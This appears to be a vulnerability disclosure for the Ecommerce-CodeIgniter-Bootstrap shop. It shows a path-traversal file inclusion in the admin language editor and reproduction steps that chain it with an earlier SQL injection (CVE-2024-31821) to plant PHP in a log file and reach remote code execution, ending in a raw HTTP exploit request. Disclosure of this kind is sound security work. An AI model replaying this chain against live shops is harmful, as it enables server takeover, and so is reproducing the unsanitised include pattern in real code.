vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)
version: before Vulnerability fixes from Lion Tree · kirilkirkov/Ecommerce-CodeIgniter-Bootstrap@d22b54e (github.com)
A file inclusion vulnerability is in getLangFolderForEdit
method of application/modules/admin/controllers/advanced_settings/Languages.php
.
By controlling $_GET['editLang']
, the attacker can make the server include .php
files under specific directory.
The attacker can use CVE-2024-31821
to write malicous PHP code in log-xxxx.php
and use this vulnerability to include PHP files under application/logs/
(At this point, BASEPATH
has been set, allowing bypass of the check at the beginning of the log file.),
which leads to remote code execution.
private function getLangFolderForEdit()
{
$langFiles = array();
$files = rreadDir('application' . DIRECTORY_SEPARATOR . 'language' . DIRECTORY_SEPARATOR . '' . $_GET['editLang'] . DIRECTORY_SEPARATOR);
$arrPhpFiles = $arrJsFiles = array();
foreach ($files as $ext => $filesLang) {
foreach ($filesLang as $fileLang) {
if ($ext == 'php') {
require $fileLang;
if (isset($lang)) {
$arrPhpFiles[$fileLang] = $lang;
unset($lang);
}
}
if ($ext == 'js') {
$jsTrans = file_get_contents($fileLang);
preg_match_all('/(.+?)"(.+?)"/', $jsTrans, $PMA);
$arrJsFiles[$fileLang] = $PMA;
unset($PMA);
}
}
}
$langFiles[0] = $arrPhpFiles;
$langFiles[1] = $arrJsFiles;
return $langFiles;
}
if (isset($_GET['editLang'])) {
$num = $this->Languages_model->countLangs($_GET['editLang']);
if ($num == 0) {
redirect('admin/languages');
}
$langFiles = $this->getLangFolderForEdit();
}
public function countLangs($name = null, $abbr = null)
{
if ($name != null) {
$this->db->where('name', $name);
}
if ($abbr != null) {
$this->db->or_where('abbr', $abbr);
}
return $this->db->count_all_results('languages');
}
The steps to reproduce are as follows:
- Add a new language called
../logs
to bypass$num = $this->Languages_model->countLangs($_GET['editLang']);
.
-
Use previous SQL injection vulnerability to write malicous PHP code into log file. This step needs to be done after the first step because adding language will clear log file.
-
Edit language
../logs
GET /Ecommerce-CodeIgniter-Bootstrap/admin/languages/?editLang=../logs HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/languages
Cookie: ci_session=inm96ingrq5a7murjrsmvjc7o7ke83jg; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1